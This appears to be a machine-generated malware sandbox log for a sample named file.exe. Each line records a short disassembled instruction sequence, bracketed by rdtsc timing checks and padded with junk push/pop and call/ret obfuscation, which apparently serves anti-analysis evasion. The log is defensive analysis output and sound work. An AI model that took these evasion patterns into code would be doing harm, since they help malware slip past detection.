Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10E13BA second address: 10E13E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF1610B867Eh 0x0000000b popad 0x0000000c push eax 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FF1610B8680h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10E23A8 second address: 10E240E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jmp 00007FF1610D070Fh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f jmp 00007FF1610D0710h 0x00000014 jc 00007FF1610D0708h 0x0000001a pushad 0x0000001b popad 0x0000001c popad 0x0000001d nop 0x0000001e push 00000000h 0x00000020 jmp 00007FF1610D070Ah 0x00000025 push 00000000h 0x00000027 xchg eax, esi 0x00000028 jmp 00007FF1610D0717h 0x0000002d push eax 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 js 00007FF1610D0706h 0x00000037 pushad 0x00000038 popad 0x00000039 popad 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10E1546 second address: 10E1556 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF1610B867Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10E240E second address: 10E2414 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10E1556 second address: 10E155A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10E155A second address: 10E156C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jno 00007FF1610D0706h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10E6C08 second address: 10E6C12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FF1610B8676h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 108B9A9 second address: 108B9BB instructions: 0x00000000 rdtsc 0x00000002 jns 00007FF1610D0706h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a je 00007FF1610D070Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 108B9BB second address: 108B9C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jnl 00007FF1610B8676h 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 108B9C9 second address: 108B9CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 108B9CD second address: 108B9F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007FF1610B867Ah 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FF1610B8688h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 108B9F8 second address: 108B9FD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10EA78B second address: 10EA793 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10EA91C second address: 10EA920 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10EA920 second address: 10EA93F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF1610B8689h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10EAC13 second address: 10EAC18 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10EAC18 second address: 10EAC26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 je 00007FF1610B8676h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10F02D3 second address: 10F02E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 mov eax, dword ptr [eax] 0x00000008 push eax 0x00000009 push edx 0x0000000a ja 00007FF1610D070Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10F02E5 second address: 10F02E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10F02E9 second address: 10F02F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF1610D070Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10F02F9 second address: 10F0313 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF1610B867Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f pushad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10F4F57 second address: 10F4F5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10F3D5A second address: 10F3D5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10F46B1 second address: 10F46B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10F4B17 second address: 10F4B2E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF1610B8680h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10F4CA5 second address: 10F4CAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10F4CAC second address: 10F4CBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FF1610B867Bh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10FAC7E second address: 10FAC87 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10FADFD second address: 10FAE1F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF1610B8688h 0x00000007 jne 00007FF1610B867Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10FAF7F second address: 10FAF8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jg 00007FF1610D0708h 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10FAF8C second address: 10FAFAB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FF1610B867Bh 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jne 00007FF1610B8676h 0x00000013 jbe 00007FF1610B8676h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10FB101 second address: 10FB112 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 ja 00007FF1610D070Ch 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10FB235 second address: 10FB242 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jno 00007FF1610B8676h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10FB242 second address: 10FB25E instructions: 0x00000000 rdtsc 0x00000002 jne 00007FF1610D0706h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jnl 00007FF1610D070Ch 0x00000011 pushad 0x00000012 push edx 0x00000013 pop edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10FB25E second address: 10FB264 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10FB264 second address: 10FB27E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 jmp 00007FF1610D0710h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10FB544 second address: 10FB548 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10FB548 second address: 10FB559 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 je 00007FF1610D0706h 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10FB559 second address: 10FB56F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FF1610B867Eh 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10FB993 second address: 10FB999 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10FB999 second address: 10FB99D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10AB5A1 second address: 10AB5B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jns 00007FF1610D070Ch 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10AB5B2 second address: 10AB5B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10AB5B7 second address: 10AB5D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF1610D0715h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10AB5D2 second address: 10AB5ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FF1610B8681h 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10790AB second address: 10790B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1104B67 second address: 1104B6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1104B6B second address: 1104B7E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 jo 00007FF1610D0716h 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 pop edi 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1086738 second address: 108673C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 108673C second address: 1086742 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1103962 second address: 1103968 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1103BE8 second address: 1103BFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF1610D0712h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1103EF6 second address: 1103EFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1103616 second address: 110361C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 110361C second address: 110363D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF1610B867Bh 0x00000009 popad 0x0000000a jbe 00007FF1610B867Eh 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 110363D second address: 1103667 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FF1610D0706h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FF1610D0717h 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1104604 second address: 110460A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11048A5 second address: 11048B5 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FF1610D0706h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push edx 0x0000000e pop edx 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1107D78 second address: 1107D91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF1610B8680h 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1107D91 second address: 1107D9B instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF1610D0706h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1107D9B second address: 1107DA0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1107DA0 second address: 1107DB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b jc 00007FF1610D0706h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1107DB1 second address: 1107DE5 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FF1610B8676h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jg 00007FF1610B86A8h 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 jmp 00007FF1610B8687h 0x0000001c popad 0x0000001d pushad 0x0000001e push ebx 0x0000001f pop ebx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C5576 second address: 10AAADF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF1610D070Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a add dword ptr [ebp+122D1A7Fh], edi 0x00000010 xor cl, 0000007Ah 0x00000013 lea eax, dword ptr [ebp+124802A4h] 0x00000019 push 00000000h 0x0000001b push ebx 0x0000001c call 00007FF1610D0708h 0x00000021 pop ebx 0x00000022 mov dword ptr [esp+04h], ebx 0x00000026 add dword ptr [esp+04h], 0000001Dh 0x0000002e inc ebx 0x0000002f push ebx 0x00000030 ret 0x00000031 pop ebx 0x00000032 ret 0x00000033 mov dword ptr [ebp+122D2323h], eax 0x00000039 push ecx 0x0000003a sbb edx, 79BBEF24h 0x00000040 pop edx 0x00000041 push eax 0x00000042 jmp 00007FF1610D0717h 0x00000047 mov dword ptr [esp], eax 0x0000004a mov dword ptr [ebp+122D18A8h], eax 0x00000050 call dword ptr [ebp+1244E5E4h] 0x00000056 push eax 0x00000057 push edx 0x00000058 push ebx 0x00000059 jmp 00007FF1610D0713h 0x0000005e jmp 00007FF1610D070Ah 0x00000063 pop ebx 0x00000064 pushad 0x00000065 jmp 00007FF1610D070Eh 0x0000006a push eax 0x0000006b push edx 0x0000006c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C5675 second address: 10C5679 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C5679 second address: 10C568B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF1610D070Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C568B second address: 10C5690 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C5690 second address: 10C5696 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C5968 second address: 10C596C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C596C second address: 10C5970 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C5970 second address: 10C597C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C597C second address: 10C5981 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C5AF0 second address: 10C5B0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop esi 0x00000006 add dword ptr [esp], 638F3462h 0x0000000d mov dl, 01h 0x0000000f push EA82DC7Eh 0x00000014 push eax 0x00000015 push edx 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 pop edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C5B0A second address: 10C5B0F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C5C76 second address: 10C5C7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C5C7A second address: 10C5C8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e pushad 0x0000000f push edi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C5F84 second address: 10C5FF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 popad 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push eax 0x0000000e call 00007FF1610B8678h 0x00000013 pop eax 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 add dword ptr [esp+04h], 00000017h 0x00000020 inc eax 0x00000021 push eax 0x00000022 ret 0x00000023 pop eax 0x00000024 ret 0x00000025 mov dx, si 0x00000028 jmp 00007FF1610B8687h 0x0000002d push 00000004h 0x0000002f jl 00007FF1610B8687h 0x00000035 jmp 00007FF1610B8681h 0x0000003a nop 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007FF1610B8682h 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C5FF6 second address: 10C5FFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C5FFC second address: 10C602B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF1610B8682h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jl 00007FF1610B8676h 0x00000015 jmp 00007FF1610B867Ch 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C6795 second address: 10C6799 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C6799 second address: 10C67AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF1610B8682h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C67AF second address: 10C67B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C6907 second address: 10AB5A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF1610B8683h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FF1610B8681h 0x0000000e popad 0x0000000f mov dword ptr [esp], eax 0x00000012 push 00000000h 0x00000014 push edi 0x00000015 call 00007FF1610B8678h 0x0000001a pop edi 0x0000001b mov dword ptr [esp+04h], edi 0x0000001f add dword ptr [esp+04h], 00000017h 0x00000027 inc edi 0x00000028 push edi 0x00000029 ret 0x0000002a pop edi 0x0000002b ret 0x0000002c lea eax, dword ptr [ebp+124802A4h] 0x00000032 jbe 00007FF1610B8679h 0x00000038 add ch, FFFFFFFAh 0x0000003b push eax 0x0000003c jmp 00007FF1610B867Bh 0x00000041 mov dword ptr [esp], eax 0x00000044 jmp 00007FF1610B867Dh 0x00000049 call dword ptr [ebp+122D19C3h] 0x0000004f push eax 0x00000050 push edx 0x00000051 pushad 0x00000052 jmp 00007FF1610B8682h 0x00000057 jp 00007FF1610B8676h 0x0000005d push eax 0x0000005e push edx 0x0000005f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11081D3 second address: 11081E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FF1610D0706h 0x0000000a pop edi 0x0000000b push esi 0x0000000c pushad 0x0000000d popad 0x0000000e pop esi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11086A8 second address: 11086B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11086B0 second address: 11086CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF1610D070Dh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 push edx 0x00000011 pop edx 0x00000012 push esi 0x00000013 pop esi 0x00000014 pop edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 110882F second address: 1108835 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1108835 second address: 110883A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11100C1 second address: 11100CF instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FF1610B8676h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 110F93B second address: 110F940 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 110FBFF second address: 110FC03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
